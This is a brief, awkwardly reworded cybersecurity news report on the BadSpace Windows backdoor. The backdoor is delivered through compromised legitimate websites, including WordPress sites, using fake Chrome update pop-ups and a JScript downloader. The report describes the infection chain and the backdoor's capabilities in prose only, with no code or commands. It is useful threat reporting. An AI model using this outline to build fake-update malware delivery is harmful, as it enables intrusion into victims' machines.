Unauthorized Users Manipulate Legal Websites to Distribute BadSpace Windows Backdoor
Websites with legal status that have been compromised are now utilized as a medium to introduce a Windows backdoor called BadSpace under the pretext of false browser updates.
“The criminal threat actor implements a complex sequence of attacks involving an infected website, a command-and-control (C2) server, at times a forged browser update, and a JScript downloader to install a backdoor into the victim’s device,” the German cybersecurity company G DATA stated in a report.
Details about the malicious software were initially divulged by researchers kevross33 and Gi7w0rm last month.
The process begins with a compromised website, which includes those constructed on WordPress, inserting code that integrates logic to check whether a user has previously visited the site.
If it is the user’s first visit, the code gathers details about the device, IP address, user-agent, and location, and sends it to a fixed domain through an HTTP GET request.
The response from the server then covers the content of the web page with a fake Google Chrome update pop-up window to directly place the malware or a JavaScript downloader that, subsequently, downloads and runs BadSpace.
An investigation into the C2 servers used in the operation has revealed links to a known malware known as SocGholish (also recognized as FakeUpdates), a downloader malware based on JavaScript that spreads through the same means.
In addition to conducting anti-sandbox checks and establishing persistence via scheduled tasks, BadSpace can obtain system information and execute commands that allow it to capture screenshots, perform instructions using cmd.exe, read and write files, and remove the scheduled task.
This revelation coincides with alerts issued by both eSentire and Sucuri regarding different schemes utilizing counterfeit browser update enticements on compromised sites to spread data stealers and remote access trojans.
About Author
